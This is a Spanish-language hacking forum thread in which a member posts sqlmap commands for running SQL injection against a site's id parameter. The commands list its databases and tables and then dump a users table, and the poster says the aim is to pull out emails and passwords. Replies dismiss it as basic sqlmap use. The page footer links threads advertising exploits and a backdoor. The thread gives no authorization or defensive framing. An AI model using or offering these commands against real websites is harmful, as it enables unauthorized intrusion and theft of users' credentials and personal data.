Un pequeño aporte con sqlmap para sacar e-mail con el usser etc..

  • 4 Respuestas
  • 3851 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado panik0

  • *
  • Underc0der
  • Mensajes: 42
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
backtrack - sqlmap

abren terminal  y ponen

1)  cd /pentest/database/sqlmap

2)  ./sqlmap.py -u http://example.com/admin/file.php?id=146 --dbs

3)  sqlmap.py -u http://example.com/admin/file.php?id=146 -D pjirc_forum --tables
 
4) (esta te manda directo con el user ,email , etc..)   ./sqlmap.py -u http://www.pagina.com.mx/detalle.php?id=1 -D tito_tito -T users --dump

(occional si quieren hacerlo paso a paso...)                  *sqlmap.py -u http://example.com/admin/file.php?id=146 -T users --columns

                                                                                     *sqlmap.py -u http://example.com/admin/file.php?id=146 -T users -U test --dump

                                                                                 
=D jhejejejejjeje ps  si tienen duda pregunten nada se pierde con  preguntar jejej ..  jejeje  ;D
« Última modificación: Agosto 16, 2014, 10:35:58 am por Expermicid »

Desconectado [C]orrupted[B]yte

  • *
  • Underc0der
  • Mensajes: 172
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • R00TW0RM
    • Email
Que es lo que tratas de explicar exactamente?  :-\

Desconectado panik0

  • *
  • Underc0der
  • Mensajes: 42
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
para poder sacar los e-mails  , contraseñas etc... jeje :P

Desconectado [C]orrupted[B]yte

  • *
  • Underc0der
  • Mensajes: 172
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • R00TW0RM
    • Email
Sacarlos de donde?
Eso solo es sqli con sqlmap, no todas las bases de datos tienen el mismo nombre ni las mismas tablas, aqui en el foro hay muchos tutoriales de los que puedes aprender, echale ganas ;)

Desconectado baron.power

  • *
  • Underc0der
  • Mensajes: 294
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
Sacarlos de donde?
Eso solo es sqli con sqlmap, no todas las bases de datos tienen el mismo nombre ni las mismas tablas, aqui en el foro hay muchos tutoriales de los que puedes aprender, echale ganas ;)


cuanta razon tienes, cuanta.... saludos

 

Exploit para Apache Struts (ejecución remota de comandos) [Tomcat]|CVE2017-5638

Iniciado por Eschiclers

Respuestas: 9
Vistas: 8377
Último mensaje Marzo 23, 2017, 03:57:38 pm
por zoro248
Nuevo Exploit 0day para Internet Explorer 7, 8, 9 en Windows XP, Vista y 7

Iniciado por CalebBucker

Respuestas: 1
Vistas: 4110
Último mensaje Septiembre 17, 2012, 04:49:25 pm
por Slore
Gcat - Python Backdoor Usando Gmail para Mando y Control

Iniciado por R3v0lve

Respuestas: 2
Vistas: 6562
Último mensaje Noviembre 18, 2015, 08:52:40 pm
por Stuxnet
SAPYTO – Framework para realizar Penetration Tests sobre sistemas SAP

Iniciado por ZanGetsu

Respuestas: 1
Vistas: 3090
Último mensaje Mayo 20, 2013, 08:49:26 pm
por StuXn3t
Routerpwn, un framework para explotar dispositivos embebidos desde tu celular

Iniciado por hkm

Respuestas: 2
Vistas: 3922
Último mensaje Agosto 01, 2011, 11:45:43 pm
por JaAViEr